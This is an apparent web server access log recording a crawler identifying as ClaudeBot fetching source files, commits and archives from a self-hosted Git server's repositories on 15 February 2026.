[Gzip 5.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/project.assets.json?display=rendered" [Client 216.73.216.188] [Length 11138] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html" [Client 216.73.216.188] [Length 10975] [Gzip 4.63] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/package.json" [Client 216.73.216.188] [Length 9861] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/requirements.txt" [Client 216.73.216.188] [Length 9921] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components" [Client 216.73.216.188] [Length 10602] [Gzip 3.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html?display=rendered" [Client 216.73.216.188] [Length 14472] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/rss/branch/main/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.g.targets" [Client 216.73.216.188] [Length 973] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/docker-compose.yml?display=rendered" [Client 216.73.216.188] [Length 10896] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/update_status.py" [Client 216.73.216.188] [Length 1390] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/python3?display=rendered" [Client 216.73.216.188] [Length 11219] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.g.targets?display=source" [Client 216.73.216.188] [Length 11909] [Gzip 3.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/templates/index.html" [Client 216.73.216.188] [Length 10181] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/requirements.txt" [Client 216.73.216.188] [Length 229] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/project.nuget.cache?display=rendered" [Client 216.73.216.188] [Length 11146] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/assets/css/style.css?display=rendered" [Client 216.73.216.188] [Length 11190] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/css/style.css" [Client 216.73.216.188] [Length 13121] [Gzip 3.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/status.json" [Client 216.73.216.188] [Length 10085] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/html/services/geminiService.ts" [Client 216.73.216.188] [Length 1787] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/docker-compose.yml" [Client 216.73.216.188] [Length 9867] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/package.json" [Client 216.73.216.188] [Length 496] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/app/models.py?display=rendered" [Client 216.73.216.188] [Length 11170] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components" [Client 216.73.216.188] [Length 9837] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/index.html" [Client 216.73.216.188] [Length 43631] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images" [Client 216.73.216.188] [Length 10165] [Gzip 3.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/nginx/proxy_host/4.conf" [Client 216.73.216.188] [Length 12991] [Gzip 4.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/vite.config.ts" [Client 216.73.216.188] [Length 11886] [Gzip 3.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/metadata.json" [Client 216.73.216.188] [Length 238] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/App.tsx" [Client 216.73.216.188] [Length 12786] [Gzip 4.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom2.png" [Client 216.73.216.188] [Length 10847] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/README.md?display=source" [Client 216.73.216.188] [Length 11793] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument/MIGRATION_GUIDE.md?display=source" [Client 216.73.216.188] [Length 20907] [Gzip 6.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/.Backup/html/services/geminiService.ts" [Client 216.73.216.188] [Length 1787] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fdbserver%2Fcommits%2Fbranch%2Fmain%2FOpcUaMinimal%2FTestService%2Fappsettings.Development.json" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/status.json" [Client 216.73.216.188] [Length 9887] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/index.html" [Client 216.73.216.188] [Length 17807] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F7e5f452449b5385fa46a3a589ed6aac00a02734a%2Fhtml" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/App.tsx" [Client 216.73.216.188] [Length 9865] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument/asset_pilot_orangepi.tar.gz" [Client 216.73.216.188] [Length 10914] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/tsconfig.json?display=source" [Client 216.73.216.188] [Length 11904] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/vite.config.ts?display=source" [Client 216.73.216.188] [Length 11910] [Gzip 3.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Fsrc%2Fbranch%2Fmain%2Fasset_pilot_docker%2Fstatic%2Fcss%2Fstyle.css" [Client 216.73.216.188] [Length 4854] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Fsrc%2Fbranch%2Fmain%2Fasset_pilot_docker%2Fapp%2Ffetcher.py" [Client 216.73.216.188] [Length 4854] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/metadata.json" [Client 216.73.216.188] [Length 9882] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/status.json" [Client 216.73.216.188] [Length 82] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/metadata.json" [Client 216.73.216.188] [Length 238] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components/Contact.tsx" [Client 216.73.216.188] [Length 9878] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/archive/adf9a81cb0ea52c9fa32f352b5800e021665bb47.zip" [Client 216.73.216.188] [Length 290280] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/metadata.json" [Client 216.73.216.188] [Length 238] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components/Footer.tsx" [Client 216.73.216.188] [Length 9877] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components/About.tsx" [Client 216.73.216.188] [Length 9876] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/package.json" [Client 216.73.216.188] [Length 9864] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components/Hero.tsx" [Client 216.73.216.188] [Length 9876] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/App.tsx" [Client 216.73.216.188] [Length 1336] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components/Contact.tsx" [Client 216.73.216.188] [Length 6703] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/lib64" [Client 216.73.216.188] [Length 9953] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/MIGRATION_GUIDE.md" [Client 216.73.216.188] [Length 9939] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/lib64" [Client 216.73.216.188] [Length 3] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/MIGRATION_GUIDE.md" [Client 216.73.216.188] [Length 7694] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components/Footer.tsx" [Client 216.73.216.188] [Length 3846] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F66e18d23c91cd4d290b6cecfdc88680af2fb97e2%2FDockerfile" [Client 216.73.216.188] [Length 4854] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?files=OpcUaMinimal%2Fobj%2FDebug%2Fnet8.0" [Client 216.73.216.188] [Length 25388] [Gzip 5.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Fsrc%2Fcommit%2Ffc1462a3f3e004bb33b52808fd01df2dfdbf79d3%2Fasset_pilot_docker%2Fapp" [Client 216.73.216.188] [Length 4854] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components/About.tsx" [Client 216.73.216.188] [Length 2920] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/package.json" [Client 216.73.216.188] [Length 9861] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components/Services.tsx" [Client 216.73.216.188] [Length 9878] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/metadata.json?display=source" [Client 216.73.216.188] [Length 11288] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components/Hero.tsx" [Client 216.73.216.188] [Length 3077] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb?files=asset_pilot_docker%2F.venv%2Finclude%2Fsite%2Fpython3.12%2Fgreenlet" [Client 216.73.216.188] [Length 29179] [Gzip 6.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv" [Client 216.73.216.188] [Length 10163] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?files=OpcUaMinimal%2Fobj" [Client 216.73.216.188] [Length 32371] [Gzip 7.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; 